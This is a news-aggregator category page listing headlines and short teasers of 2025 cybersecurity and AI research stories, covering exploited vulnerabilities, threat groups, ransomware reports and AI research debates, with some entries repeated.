A financially motivated threat group is attacking organizations using fully patched, end-of-life SonicWall Secure Mobile Access 100 series appliances, Google Threat Intelligence Group said in a report released Wednesday. The group, which Google identifies as UNC6148, is using previously stolen admin credentials to gain access to SonicWall SMA 100 series appliances, remote access VPN devices…
Category: Research
Cybercrime, Cybersecurity, Global Security News, Government, North America, Research
Former Army soldier pleads guilty to widespread attack spree linked to AT&T, Snowflake and others
A 21-year-old former Army soldier pleaded guilty Tuesday to charges stemming from a series of attacks and extortion attempts last year on telecommunications companies, including AT&T. Cameron John Wagenius, who identified himself as “kiberphant0m” and “cyb3rph4nt0m” on online criminal forums, conducted extensive malicious activity for years, including while he was on active duty, the Justice…
Cybercrime, Cybersecurity, Exploits, Global Security News, Research, Threats
AsyncRAT seeds family of more than 30 remote access trojans
AsyncRAT, the most prevalent remote access trojan observed in the wild, has spawned more than 30 forks and variants that increase the impact of the open-source malware, making it a popular and sometimes disguised tool of choice for cybercriminals, ESET researchers said in a report released Tuesday. The open source remote access tool, which was…
CISA, Cybercrime, Cybersecurity, Exploits, Global Security News, Research, Threats
CitrixBleed 2 beckons sweeping alarm as exploits spread across the globe
Authorities and researchers are intensifying warnings about active exploitation and pervasive scanning of a critical vulnerability affecting multiple versions of Citrix NetScaler products. There is now widespread agreement among security professionals that the critical vulnerability, CVE-2025-5777, which Citrix disclosed June 17, is serious and harkens back to a 2023 defect in the same products: “CitrixBleed,”…
AI, Cybersecurity, Exploits, Global Security News, Research, Technology, Uncategorized
Is XBOW’s success the beginning of the end of human-led bug hunting? Not yet.
When news broke that an AI agent named XBOW was leading the HackerOne bug bounty leaderboards, it quickly raised several concerning questions for the cybersecurity industry. Have large language models evolved enough to partially or fully replace human bug hunting? How precisely does XBOW — built by a startup with the same name — work?…
Cybersecurity, Exploits, Global Security News, Microsoft, Research, Technology, Threats
Microsoft Patch Tuesday addresses 130 vulnerabilities, none actively exploited
Microsoft addressed 130 vulnerabilities across its products and underlying Windows systems, but none have been actively exploited in the wild, the company said in its latest security update Tuesday. A proof-of-concept exploit for a high-severity defect in SQL Server — CVE-2025-49719 — has been shared publicly, researchers said. The information disclosure vulnerability, which has a…
Application Security, Cybersecurity, Exploits, Global Security News, Research, Technology, Threats
Oligo Security strives to fill application-layer gaps in MITRE ATT&CK framework
Applications are a common intrusion point, but the way attackers gain access, maneuver and create mayhem within and across applications doesn’t always neatly fit into MITRE’s ATT&CK framework. The team at Oligo Security is releasing a new framework it calls Application Attack Matrix to complement areas of MITRE’s framework that it describes as too broad,…
Cybercrime, Cybersecurity, Exploits, Geopolitics, Global Security News, Research, Threats
China-linked attacker hit France’s critical infrastructure via trio of Ivanti zero-days last year
Multiple critical infrastructure sectors were hit last year during an attack spree in France via a trio of zero-day vulnerabilities affecting Ivanti Cloud Service Appliance devices, the country’s cybersecurity agency said in a report released Tuesday. Government agencies and organizations in the telecommunications, media, finance and transportation industries were impacted by widespread zero-day exploits of…
Asia Pacific, china, Cybersecurity, Global Security News, Research, Threats
Stealth China-linked ORB network gaining footholds in US, East Asia
A recently discovered operational relay box (ORB) network controlled by a China-linked threat group already exceeds 1,000 devices and is growing across the United States and East Asia, SecurityScorecard said in a threat report released Monday. The ORB network, which SecurityScorecard dubbed “LapDogs,” is primarily composed of routers designed for small or home offices but…
AI, Artificial Intelligence (AI), Cybersecurity, Exploits, Global Security News, Research, software security, Technology, Uncategorized, vibe coding
Vibe coding is here to stay. Can it ever be secure?
Software powers the world, and soon, the bulk of the work making it may be done by machines. As generative AI tools have gotten more proficient at coding, their use in software development has exploded. Proponents say the tools have made it dramatically easier for individual entrepreneurs or companies to create the kind of slick,…
AI, Artificial Intelligence (AI), Cybersecurity, Exploits, Global Security News, Research, software security, Technology, Uncategorized, vibe coding
Vibe coding is here to stay. Can it ever be secure?
Software powers the world, and soon, the bulk of the work making it may be done by machines. As generative AI tools have gotten more proficient at coding, their use in software development has exploded. Proponents say the tools have made it dramatically easier for individual entrepreneurs or companies to create the kind of slick,…
AI, Artificial Intelligence (AI), Cybersecurity, Exploits, Global Security News, Research, software security, Technology, Uncategorized, vibe coding
Vibe coding is here to stay. Can it ever be secure?
Software powers the world, and soon, the bulk of the work making it may be done by machines. As generative AI tools have gotten more proficient at coding, their use in software development has exploded. Proponents say the tools have made it dramatically easier for individual entrepreneurs or companies to create the kind of slick,…
crowdstrike, Cybercrime, Cybersecurity, Global Security News, Google, Mandiant, Microsoft, Palo Alto Networks, Ransomware, Research, Threat group, Threats, Uncategorized, Unit 42
CrowdStrike, Microsoft aim to eliminate confusion in threat group attribution
CrowdStrike and Microsoft announced an agreement Monday to formally connect the different names each company uses for the same threat groups in their attribution analysis. The companies said the effort will clarify inconsistencies across the industry’s naming taxonomies and acknowledge when both companies identify the same threat groups. The alliance between the longstanding competitors doesn’t…
crowdstrike, Cybercrime, Cybersecurity, Global Security News, Google, Mandiant, Microsoft, Palo Alto Networks, Ransomware, Research, Threat group, Threats, Uncategorized, Unit 42
CrowdStrike, Microsoft aim to eliminate confusion in threat group attribution
CrowdStrike and Microsoft announced an agreement Monday to formally connect the different names each company uses for the same threat groups in their attribution analysis. The companies said the effort will clarify inconsistencies across the industry’s naming taxonomies and acknowledge when both companies identify the same threat groups. The alliance between the longstanding competitors doesn’t…
crowdstrike, Cybercrime, Cybersecurity, Global Security News, Google, Mandiant, Microsoft, Palo Alto Networks, Ransomware, Research, Threat group, Threats, Uncategorized, Unit 42
CrowdStrike, Microsoft aim to eliminate confusion in threat group attribution
CrowdStrike and Microsoft announced an agreement Monday to formally connect the different names each company uses for the same threat groups in their attribution analysis. The companies said the effort will clarify inconsistencies across the industry’s naming taxonomies and acknowledge when both companies identify the same threat groups. The alliance between the longstanding competitors doesn’t…
Commentary, CVE, Cybersecurity, Exploits, Global Security News, MITRE, NVD, Research, Technology, Threats, Vulnerability Management
Future-ready cybersecurity: Lessons from the MITRE CVE crisis
The recent funding crisis surrounding MITRE’s Common Vulnerabilities and Exposures (CVE) program was more than just a bureaucratic hiccup — it was a wake-up call for an industry that has relied on CVEs for years to identify, categorize, and prioritize vulnerabilities. Out of the blue, we discovered the foundation was suddenly at risk. Worse still,…
Commentary, CVE, Cybersecurity, Exploits, Global Security News, MITRE, NVD, Research, Technology, Threats, Vulnerability Management
Future-ready cybersecurity: Lessons from the MITRE CVE crisis
The recent funding crisis surrounding MITRE’s Common Vulnerabilities and Exposures (CVE) program was more than just a bureaucratic hiccup — it was a wake-up call for an industry that has relied on CVEs for years to identify, categorize, and prioritize vulnerabilities. Out of the blue, we discovered the foundation was suddenly at risk. Worse still,…
Commentary, CVE, Cybersecurity, Exploits, Global Security News, MITRE, NVD, Research, Technology, Threats, Vulnerability Management
Future-ready cybersecurity: Lessons from the MITRE CVE crisis
The recent funding crisis surrounding MITRE’s Common Vulnerabilities and Exposures (CVE) program was more than just a bureaucratic hiccup — it was a wake-up call for an industry that has relied on CVEs for years to identify, categorize, and prioritize vulnerabilities. Out of the blue, we discovered the foundation was suddenly at risk. Worse still,…
cyberattack, Cybersecurity, Exploits, Global Security News, Hardware, Research, Security Bloggers Network, Threats & Breaches
Hacking the Hardware Brains of Computers is the Ultimate Cyberattack
Compromising the hardware layer, especially the CPU, is the Holy Grail of cyberattacks. Recent work by Christiaan Beek, a leading cybersecurity researcher at Rapid7, into developing a ransomware proof-of-concept that infects at the hardware layer, inside the CPU, is truly scary. The research demonstrates just how real this threat could become. He was able to…
Cybercrime, Cybersecurity, Exploits, Global Security News, Microsoft, Patch Tuesday, Ransomware, Research, Threats, vulnerabilities, zero days
Microsoft’s Patch Tuesday closes 72 vulnerabilities, including 5 zero-days
Microsoft addressed 72 vulnerabilities affecting its core products and underlying systems, including five actively exploited zero-days across various Windows components, the company said in its latest security update Tuesday. “This is now the eight consecutive Patch Tuesday on which Microsoft has published zero-day vulnerabilities without evaluating any of them as critical severity at time of…
Check Point, CISA, cisco, CVE, Cybercrime, Cybersecurity, Cybersecurity and Infrastructure Security Agency (CISA), exploit, Exploits, firewall, Fortinet, Global Security News, Mandiant, Palo Alto Networks, Rapid7, Research, sonicwall, Technology, Threats, virtual private network (VPN), vulnerabilities
SonicWall customers confront resurgence of actively exploited vulnerabilities
Vulnerabilities are proliferating in SonicWall devices and software this year, putting the vendor’s customers at risk of intrusion via secure access gateways and firewalls. The year started off on a sour note for the California-based company when it released security advisories for nine vulnerabilities on Jan. 7. The total number of vulnerabilities publicly disclosed by…
Amazon, CISA, crowdstrike, Cybersecurity, Cybersecurity and Infrastructure Security Agency (CISA), Global Security News, Google, Government, intelligence sharing, Joint Cyber Defense Collaborative, Joint Cyber Defense Collaborative (JCDC), National Security Agency, Palo Alto Networks, Research, Technology, Threat Intelligence, Threats
Amazon, CrowdStrike, Google and Palo Alto Networks claim no change to threat intel sharing under Trump
SAN FRANCISCO — Threat intelligence sharing is flowing between the private sector and federal government and remains unimpeded thus far by job losses and budget cuts across federal agencies that support the cyber mission, according to executives at major security firms. Top brass at Amazon, CrowdStrike, Google and Palo Alto Networks said there’s been no…
Global Security News, Research, Security Bloggers Network
Vulnerability Management: A Race Against Time & Complexity
The post Vulnerability Management: A Race Against Time & Complexity appeared first on AI Security Automation. The post Vulnerability Management: A Race Against Time & Complexity appeared first on Security Boulevard.
Cybercrime, Cybersecurity, Global Security News, google cloud, Google Threat Intelligence Group, Mandiant, North Korea, North Korean IT workers, Research, Technology, Threats
North Korean operatives have infiltrated hundreds of Fortune 500 companies
SAN FRANCISCO — North Korean nationals have infiltrated the employee ranks at top global companies more so than previously thought, maintaining a pervasive and potentially widening threat against IT infrastructure and sensitive data. “There are hundreds of Fortune 500 organizations that have hired these North Korean IT workers,” Mandiant Consulting CTO Charles Carmakal said Tuesday…
Amazon, crowdstrike, Cybercrime, Cybersecurity, Global Security News, Government, law enforcement, Research, RSAC 2025 Conference, Threat Intelligence, Threats
Amazon, CrowdStrike leaders say private threat intel can quickly bring cybercriminals to justice
SAN FRANCISCO — Threat intelligence flowing from private companies to cybersecurity authorities and law enforcement agencies is critical to the disruption of malicious activities and the arrests of cybercriminals, security leaders at Amazon and CrowdStrike said Monday during the RSAC 2025 Conference. When the private sector and governments interact well, actively participating and sharing resources…
Global Security News, Research, Security Bloggers Network
Fraudulent email domain tracker: April 2025
This is the first release in a new Castle series highlighting email domains associated with fraudulent activity. Our goal is to provide visibility into email infrastructure commonly abused by bots and fraudsters, so that security teams can improve their detection systems. Each month, we’ll publish a ranked list The post Fraudulent email domain tracker: April…
china, critical infrastructure, FireEye, Global Security News, North Korea, North Korean IT workers, Ransomware, Research, Russia, SentinelOne, SolarWinds, telecommunications, Threats, Workforce
Cybersecurity vendors are themselves under attack by hackers, SentinelOne says
Cybersecurity companies don’t just defend their customers against cyberattacks — they also have to defend themselves, and a SentinelOne report published Monday examines some of the biggest threats they’re facing. Those include ransomware, Chinese government-sponsored hackers and North Korean IT workers posing as job applicants, according to the report from SentinelOne’s SentinelLabs. “In recent months,…
CVE, Cybercrime, Cybersecurity, Exploits, Global Security News, Research, SAP, Threats, vulnerabilities, zero days
SAP zero-day vulnerability under widespread active exploitation
Threat hunters and security researchers have observed widespread exploitation of a zero-day vulnerability affecting SAP NetWeaver systems. The unrestricted file upload vulnerability — CVE-2025-31324 — has a base score of 10 on the CVSS scale and allows attackers to upload files directly to the system without authorization. The software defect, which affects the SAP Visual…
CISA, Cybersecurity, Cybersecurity and Infrastructure Security Agency (CISA), Exploits, Global Security News, IBM X-Force, known exploited vulnerabilities (KEV), Mandiant, Research, Verizon Data Breach Investigations Report, Verizon DBIR, VulnCheck, vulnerabilities
VulnCheck spotted 159 actively exploited vulnerabilities in first few months of 2025
Attackers exploited nearly a third of vulnerabilities within a day of CVE disclosure in the first quarter of 2025, VulnCheck said in a report released Thursday. The company, which focuses on vulnerability threat intelligence, identified 159 actively exploited vulnerabilities from 50 sources during the quarter. The time from CVE disclosure to evidence of exploitation in…
Cybercrime, Cybersecurity, exploit, Exploits, firewall, Fortinet, Global Security News, Google Threat Intelligence Group, ivanti, Mandiant, Palo Alto Networks, Ransomware, Research, routers, Threats, virtual private network (VPN), vulnerabilities
Attackers hit security device defects hard in 2024
Attackers are having a field day with software defects in security devices, according to a new report released Wednesday by Mandiant Exploits were the most common initial infection vector, representing 1 of every 3 attacks in 2024, and the four most frequently exploited vulnerabilities were all contained in edge devices, such as VPNs, firewalls and…
Cybercrime, Cybersecurity, Cybersecurity and Infrastructure Security Agency (CISA), Data Breaches, Exploitation, Exploits, Global Security News, Ransomware, ransomware payments, Research, Threats, Verizon Data Breach Investigations Report, Verizon DBIR, zero days
Verizon discovers spike in ransomware and exploited vulnerabilities
Cybercriminals and state-sponsored threat groups exploited vulnerabilities and initiated ransomware attacks with vigor last year, escalating the scope of their impact by hitting more victims and outmaneuvering defenses with speed. The rate of ransomware detected in data breaches jumped 37%, occurring in 44% of the 12,195 data breaches reviewed in Verizon’s 2025 Data Breach Investigations…
Cybercrime, Cybersecurity, exploit, Exploits, Global Security News, IBM, IBM X-Force, Research, stolen credentials, Threats, vulnerabilities
Attackers stick with effective intrusion points, valid credentials and exploits
IBM X-Force observed an identical breakdown of the top methods cybercriminals used to intrude networks for two years running, the company said in its annual Threat Intelligence Index. The top initial access vectors, valid account credentials and exploitation of public-facing applications, each accounted for 30% of IBM X-Force incident response cases last year. By focusing…
AI, Global IT News, Global Security News, Government & Policy, Research
An AI doctoral candidate in California says they had their student visa revoked
An AI doctoral student in California had their SEVIS record — the digital proof of their valid student visa — terminated, putting their immigration status at risk. Speaking to TechCrunch, the student, who requested anonymity for fear of reprisal, said they were notified via their college’s international student center that they’d been identified in a criminal records…
Blog, Global Security News, Research, Security Bloggers Network
Trump vs. Biden Cyber Strategy — According to AI
We asked an AI agent to analyze the latest shift in U.S. cybersecurity policy, comparing past strategies under Biden to the new 2025 Trump Executive Order. The result? A surprisingly structured analysis that maps out the core philosophical and operational differences, from federal-led resilience to localized risk ownership. But this raises a more provocative question:…
china, CISA, cisco, citrix, CVE, Cybercrime, Cybersecurity, Cybersecurity and Infrastructure Security Agency (CISA), espionage, exploit, Exploits, firewall, firewalls, Fortinet, Gartner, Global Security News, Google Threat Intelligence Group, ivanti, known exploited vulnerabilities (KEV), Mandiant, National Vulnerability Database, NIST, Palo Alto Networks, Rapid7, Research, routers, Technology, Threats, virtual private network (VPN), VulnCheck, vulnerabilities, vulnerability disclosure, zero days
Is Ivanti the problem or a symptom of a systemic issue with network devices?
Network edge devices — hardware that powers firewalls, VPNs and network routers — have quickly moved up the list of attackers’ preferred intrusion points into enterprise networks. While dozens of companies make and sell these devices, customers of one company in particular — Ivanti — have confronted exploited vulnerabilities in their products more than any…
AI, Artificial Intelligence, Global Security News, Microsoft, Research
AI models still struggle to debug software, Microsoft study shows
AI models from OpenAI, Anthropic, and other top AI labs are increasingly being used to assist with programming tasks. Google CEO Sundar Pichai said in October that 25% of new code at the company is generated by AI, and Meta CEO Mark Zuckerberg has expressed ambitions to widely deploy AI coding models within the social…
AI, Artificial Intelligence, Global Security News, Microsoft, Research
AI models still struggle to debug software, Microsoft study shows
AI models from OpenAI, Anthropic, and other top AI labs are increasingly being used to assist with programming tasks. Google CEO Sundar Pichai said in October that 25% of new code at the company is generated by AI, and Meta CEO Mark Zuckerberg has expressed ambitions to widely deploy AI coding models within the social…
AI, Artificial Intelligence, Global Security News, Microsoft, Research
AI models still struggle to debug software, Microsoft study shows
AI models from OpenAI, Anthropic, and other top AI labs are increasingly being used to assist with programming tasks. Google CEO Sundar Pichai said in October that 25% of new code at the company is generated by AI, and Meta CEO Mark Zuckerberg has expressed ambitions to widely deploy AI coding models within the social…
Cybercrime, Cybersecurity, Exploits, Global Security News, Microsoft, Patch Tuesday, Ransomware, Research, Threats, vulnerabilities, zero days
Microsoft patches zero-day actively exploited in string of ransomware attacks
Microsoft addressed 126 vulnerabilities affecting its systems and core products, including a zero-day in the Windows Common Log File System (CLFS) that’s been actively exploited in a series of ransomware attacks, the company said in its latest security update Tuesday. A group Microsoft tracks as Storm-2460 has exploited CVE-2025-29824 to initiate ransomware attacks “against a…
Exploits, Global Security News, ntlm relay, Red Team, Research, Security Bloggers Network, Social Engineering
The Renaissance of NTLM Relay Attacks: Everything You Need to Know
NTLM relay attacks have been around for a long time. While many security practitioners think NTLM relay is a solved problem, or at least a not-so-severe one, it is, in fact, alive and kicking and arguably worse than ever before. Relay attacks are the easiest way to compromise domain-joined hosts nowadays, paving a path for…
Email Security Insights, Global Security News, North America, Research, Security Bloggers Network
DMARC Adoption in U.S. and Canada Higher Education Sector
We’re looking at how DMARC adoption is shaping the email security landscape of colleges and universities in North America. The post DMARC Adoption in U.S. and Canada Higher Education Sector appeared first on Security Boulevard.
china, CISA, Cybersecurity, Cybersecurity and Infrastructure Security Agency, espionage, exploit, Exploits, Global Security News, Google Threat Intelligence Group, ivanti, known exploited vulnerabilities (KEV), Mandiant, Research, Threats, vulnerability
China-backed espionage group hits Ivanti customers again
Ivanti customers are confronting another string of attacks linked to an actively exploited vulnerability in the company’s VPN products. Mandiant said a nation-state backed espionage group linked to China has been exploiting the critical vulnerability, CVE-2025-22457, since mid-March. The threat group, which Google Threat Intelligence Group tracks as UNC5221, has a knack for exploiting Ivanti…
Asia Pacific, Email Security Insights, Global Security News, Research, Security Bloggers Network
DMARC Adoption among APAC’s Higher Education Sector
On the heels of our DMARC adoption research in Europe’s higher education sector, we’re taking a look to see how schools in the Asia Pacific region are faring with their email security. The post DMARC Adoption among APAC’s Higher Education Sector appeared first on Security Boulevard.
Check Point, cisco, Cybersecurity, Exploits, firewall, Forcepoint, Fortinet, Global Security News, google cloud, Juniper Networks, Microsoft Azure, Palo Alto Networks, Research, Technology, Versa Networks
Independent tests show why orgs should use third-party cloud security services
Businesses don’t always get what they pay for in cybersecurity. Some of the most expensive cloud network firewall vendors are among the worst performers against exploits and evasions, according to the most comprehensive, independent testing CyberRatings.org has conducted to date. Cisco, by far the most expensive cloud network firewall offering across the top 10 vendors…
cisco, Cisco Talos, Cybercrime, Cybersecurity, Global Security News, identity, identity authentication, Ransomware, Research, Threats
Identity lapses ensnared organizations at scale in 2024
Cybercriminals predominantly relied on weaknesses in identity controls to afflict organizations in 2024, with valid accounts being the main way they gained access for the second year in a row, Cisco Talos said in an annual report released Monday. Across the incident response cases Cisco Talos responded to last year, 60% involved an identity attack…
Blog, Global Security News, Research, Security Bloggers Network
Tax Season Threat Surge
Veriti Research has identified a significant rise in tax-related malware samples across multiple platforms. The research team discovered malware samples targeting Android, Linux, and Windows, all connected to the same adversary operating from a single IP address. We believe the attacker is running multiple parallel campaigns and using “Malware-as-a-Service” tools to target various platforms simultaneously,…
crowdstrike, Cybercrime, Cybersecurity, Global Security News, North Korea, North Korean IT workers, Palo Alto Networks, Research, Threats, Unit 42
The North Korea worker problem is bigger than you think
North Korean nationals have infiltrated businesses across the globe with a more expansive level of organization and deep-rooted access than previously thought, insider risk management firm DTEX told CyberScoop. This swarm of technical North Korean experts isn’t just intruding businesses as ad hoc freelance IT workers; they’ve gained full-time employment as engineers and specialists of…
Blog, Global Security News, Research, Security Bloggers Network
Inside Daisy Cloud: 30K Stolen Credentials Exposed
Veriti research recently analyzed stolen data that was published in a telegram group named “Daisy Cloud” (potentially associated with the RedLine Stealer), exposing the inner workings of a cybercrime marketplace. This group offers thousands of stolen credentials in an ongoing basis across a wide range of services, from crypto exchanges to government portals, at disturbingly…
Blog, Global Security News, Research, Security Bloggers Network
Genetic Breach Fallout: 23andMe’s Collapse Raises Security Alarms
In 2023, a massive data breach at 23andMe shook the foundation of the consumer genomics industry. Fast forward to today, the company has filed for bankruptcy. From Veriti’s perspective, this incident highlights the devastating consequences of failing to secure deeply sensitive personal data, especially when that data reaches beyond individuals and into family legacies. Veriti…
Cybersecurity, extensions, Global Security News, Research, threat, Threats, Web Browsers
Browser extension sales, updates pose hidden threat to enterprises
Sometimes the simplest pieces of software can cause the most complex security headaches for organizations. Browser extensions, which can be bought, sold and repurposed without warning, are a blind spot for organizations — ignored and often left unrecognized as a hidden threat. John Tuckner, founder of the browser extension security company Secure Annex, recently demonstrated…
Cloud Security, Cybersecurity, Exploits, Global Security News, Kubernetes, Nginx, open source, open source software, Research, Threats
String of defects in popular Kubernetes component puts 40% of cloud environments at risk
More than 40% of cloud environments are at risk of an account takeover due to a series of five recently discovered vulnerabilities — one regarded critical — in the Ingress Ngnix Controller for Kubernetes, according to security research published this week. Upon discovering the string of vulnerabilities in one of most widely used ingress controllers…
CVE, Cybersecurity, Exploits, Global Security News, Next.js, open source, open source software, Research, vulnerability, vulnerability disclosure
Researchers raise alarm about critical Next.js vulnerability
Researchers warn that attackers could exploit a recently discovered critical vulnerability in the open-source JavaScript framework Next.js to bypass authorization in middleware and gain access to targeted systems. Vercel, the San Francisco-based company that created and maintains Next.js, released a patch for CVE-2025-29927 in Next.js 15.2.3 on March 18 and published a security advisory on…
china, Cybercrime, Cybersecurity, Evil Corp, Exploits, Global Security News, Government, India, Microsoft, nation state threats, nation-state hackers, North Korea, pakistan, Ransomware, Research, Russia, Stanford University, Threats, trend micro, vulnerability, Windows, Zero Day Initiative, zero days
Nation-state groups hit hundreds of organizations with Microsoft Windows zero-day
Cybercriminals working on behalf of at least six nation-states are actively exploiting a zero-day vulnerability in Microsoft Windows to commit espionage, steal data and cryptocurrency, according to Trend Micro researchers. The vulnerability, which Trend Micro tracks as ZDI-CAN-25373, allows attackers to execute hidden malicious commands due to the way Windows displays the contents of shortcut…
AI, Global IT News, Global Security News, Research, scaling
Researchers say they’ve discovered a new method of ‘scaling up’ AI, but there’s reason to be skeptical
Have researchers discovered a new AI “scaling law”? That’s what some buzz on social media suggests — but experts are skeptical. AI scaling laws, a bit of an informal concept, describe how the performance of AI models improves as the size of the datasets and computing resources used to train them increases. Until roughly a…
AI, Global IT News, Global Security News, iclr, Research
Academics accuse AI startups of co-opting peer review for publicity
There’s a controversy brewing over “AI-generated” studies submitted to this year’s ICLR, a long-running academic conference focused on AI. At least three AI labs — Sakana, Intology, and Autoscience — claim to have used AI to generate studies that were accepted to ICLR workshops. At conferences like ICLR, workshop organizers typically review studies for publication…
Cybercrime, Cybersecurity, Data Breaches, Flashpoint, Global Security News, identity, identity theft, Information stealing malware, infostealers, malware, Ransomware, Research, stolen credentials
Infostealers fueled cyberattacks and snagged 2.1B credentials last year
Cybercriminals used information-stealing malware to a devastating effect last year, capturing sensitive data that fueled ransomware, breaches and attacks targeting supply chains and critical infrastructure, according to a new report. Infostealers were used to steal 2.1 billion credentials last year, accounting for nearly two-thirds of 3.2 billion credentials stolen from all organizations, Flashpoint said in a…
Global Security News, Research, Security Bloggers Network
How to detect Headless Chrome bots instrumented with Puppeteer?
Headless Chrome bots powered by Puppeteer are a popular choice among bot developers. The Puppeteer API’s ease of use, combined with the lightweight nature of Headless Chrome, makes it a preferred tool over its full-browser counterpart. It is commonly used for web scraping, credential stuffing attacks, and the The post How to detect Headless Chrome…
CryptoCurrency, Cybercrime, Cybersecurity, GitHub, Global Security News, malware, North Korea, npm, Research, Socket, software security, Threats
Lazarus Group deceives developers with 6 new malicious npm packages
Lazarus Group has burrowed deeper into the npm registry and planted six new malicious packages designed to deceive software developers and disrupt their workflows, researchers at cybersecurity firm Socket said in a Monday blog post. The North Korea-linked threat group embedded BeaverTail malware into the npm packages to install backdoors and steal credentials and data…
AI, Global IT News, Global Security News, Research, sakana
Sakana claims its AI-generated paper passed peer review — but it’s a bit more nuanced than that
Japanese startup Sakana said that its AI generated the first peer-reviewed scientific publication. But while the claim isn’t untrue, there are significant caveats to note. The debate swirling around AI and its role in the scientific process grows fiercer by the day. Many researchers don’t think AI is quite ready to serve as a “co-scientist,”…
cyber security, esp32, Exploits, Global Security News, Hardware, internet of things, IoT Security, microcontroller, Mobile Security, Mobility, Research, Security, supply chain, tarlogic, vulnerability, wifi
Billions of Devices at Risk of Hacking & Impersonation Due to Hidden Commands
Researchers warn these commands could be exploited to manipulate memory, impersonate devices, and bypass security controls.
Blog, Global Security News, Research, Security Bloggers Network
Inside Black Basta Ransomware Group’s Chat Leak
Internal conflicts within the notorious Black Basta ransomware group have led to a massive leak of the group’s internal chat messages. While the messages are disorganized and full of internal jargon, they contain a wealth of insight into the group’s operations and techniques. This type of disclosure can be a goldmine for security professionals because…
china, Cybercrime, Cybersecurity, Exploits, Global Security News, hacking, ivanti, Microsoft Threat Intelligence Center, Research, silk typhoon, Threats
Silk Typhoon shifted to specifically targeting IT management companies
The Chinese state-backed threat group Silk Typhoon shifted tactics in late 2024 to broaden access and enable follow-on attacks against downstream customers of its initial targets, Microsoft Threat Intelligence said in a blog released Wednesday. The Chinese espionage group, which is also known as APT27, has abused stolen API keys and credentials for privileged access…
crowdstrike, Cybercrime, Cybersecurity, Global Security News, hacking, Palo Alto Networks, Ransomware, ReliaQuest, Research, Threat Intelligence, Threats, Unit 42
Cybercriminals picked up the pace on attacks last year
Threat actors became increasingly efficient last year, rapidly achieving lateral movement and swiftly stealing data at a faster clip than ever before, according to multiple threat intelligence firms. The reduced time frame is a clear indicator that cybercriminals are constantly improving their ability to be successful. With the abuse of legitimate system tools to help…
AI, Global IT News, Global Security News, Research, science
Experts don’t think AI is ready to be a ‘co-scientist’
Last month, Google announced the “AI co-scientist,” an AI the company said was designed to aid scientists in creating hypotheses and research plans. Google pitched it as a way to uncover new knowledge, but experts think it — and tools like it — fall well short of PR promises. “This preliminary tool, while interesting, doesn’t…
Blog, Exploits, Global Security News, Research, Security Bloggers Network
Veriti Research Uncovers Malware Exploiting Cloud Services
Veriti Research has identified a growing trend – attackers leveraging cloud infrastructure to facilitate malware distribution and command-and-control (C2) operations. This evolving tactic not only makes detection more challenging but also exposes organizations to significant security risks. Malware Hosted on Cloud Services One of the most alarming findings from our research is that over 40%…
Blog, Global Security News, Research, Security Bloggers Network
DPRK IT Fraud Network Uses GitHub to Target Global Companies
Nisos DPRK IT Fraud Network Uses GitHub to Target Global Companies Nisos is tracking a network of likely North Korean (DPRK)-affiliated IT workers posing as Vietnamese, Japanese, and Singaporean nationals with the goal of obtaining employment in remote engineering… The post DPRK IT Fraud Network Uses GitHub to Target Global Companies appeared first on Nisos…
Email Security Insights, Europe, Global Security News, Research, Security Bloggers Network
DMARC Adoption among Europe’s Higher Education Sector
This installment of DMARC adoption initiates a series on DMARC adoption, focusing on policy levels and best practices, in the higher education sector. We’ll begin with Europe. The post DMARC Adoption among Europe’s Higher Education Sector appeared first on Security Boulevard.
Cybercrime, Cybersecurity, Department of Justice (DOJ), Global Security News, Google Threat Intelligence Group, North America, Ransomware, Research, Russia, Snowflake, Threats, Unit 221B
Army soldier linked to Snowflake attack spree allegedly tried to sell data to foreign spies
U.S. authorities say a 21-year-old U.S. Army soldier attempted to sell stolen sensitive information to a foreign intelligence service as part of a broader effort to extort victims and leak call records of high-ranking public officials. In November while on active duty, Cameron Wagenius made multiple attempts to extort $500,000 from a major telecommunications company…
AI, Global IT News, Global Security News, In Brief, Research, vulnerability
AI models trained on unsecured code become toxic, study finds
A group of AI researchers has discovered a curious — and troubling — phenomenon: Models say some pretty toxic stuff after being fine-tuned on unsecured code. In a recently published paper, the group explained that training models, including OpenAI’s GPT-4o and Alibaba’s Qwen2.5-Coder-32B-Instruct, on code that contains vulnerabilities leads the models to give dangerous advice,…
Asia Pacific, china, crowdstrike, Cybersecurity, Global Security News, nation state threats, Research, Salt Typhoon, Threats, Volt Typhoon
It’s not just Salt Typhoon: All China-backed attack groups are showcasing specialized offensive skills
Cyberattacks carried out by China-backed nation-state actors surged last year, showcasing technical advancements and specialized targeting in a broader escalation of the country’s ability to infiltrate global critical infrastructure, CrowdStrike said in an annual threat report released Thursday. “After decades of investment into China’s offensive capabilities, they’re now on par with other world powers,” Adam…
Cybercrime, Cybersecurity, encryption, extortion, Global Security News, Incident Response, Palo Alto Networks, Ransomware, Research, Threats, Uncategorized, Unit 42
Threat actors are increasingly trying to grind business to a halt
Cybercriminals intentionally disrupted operations at a growing rate last year, Palo Alto Networks’ threat intelligence firm Unit 42 said in an annual incident response report released Tuesday. Of the nearly 500 major cyberattacks Unit 42 responded to last year, 86% involved business disruption, including operational downtime, fraud-related losses, increased operating costs and negative reputational impacts. …
Cybercrime, Cybersecurity, Global Security News, Google Threat Intelligence Group, Ransomware, Recorded Future, Research
What defenders are learning from Black Basta’s leaked chat logs
Black Basta’s internal chat logs, which were leaked earlier this month, are providing defenders with actionable intelligence on the ransomware group’s operations, cybercrime experts told CyberScoop. Researchers sifting through Black Basta’s exposed communications found details about the group’s preferred tools and techniques, including custom malware loaders, indicators of compromise, cryptocurrency wallets and email addresses associated…
china, cisco, Cisco Talos, Cybersecurity, Cybersecurity and Infrastructure Security Agency (CISA), Exploits, Global Security News, Research, Salt Typhoon, telecommunications, Threat Intelligence, Threats
Salt Typhoon gained initial access to telecoms through Cisco devices
Salt Typhoon gained initial access to Cisco devices as part of the Chinese nation-state threat group’s sweeping attacks on U.S. telecom networks, the company confirmed Thursday in a threat intelligence report. Cisco Talos, the networking vendor’s threat intelligence unit, said it observed one instance where Salt Typhoon likely exploited a seven-year-old critical vulnerability in Cisco…
Cybercrime, Cybersecurity, Global Security News, Google Threat Intelligence Group, GRU, messaging apps, phishing, Research, Russia, Sandworm, signal, Threats, Uncategorized
Russia-aligned threat groups dupe Ukrainian targets via Signal
Russian state threat groups have compromised Signal accounts used by Ukrainian military and government personnel to eavesdrop on real-time communications, Google Threat Intelligence Group said in a report released Wednesday. “This is a persistent, ongoing campaign being carried out by multiple different Russia-aligned threat actors,” Dan Black, principal analyst at Google Threat Intelligence Group, said…
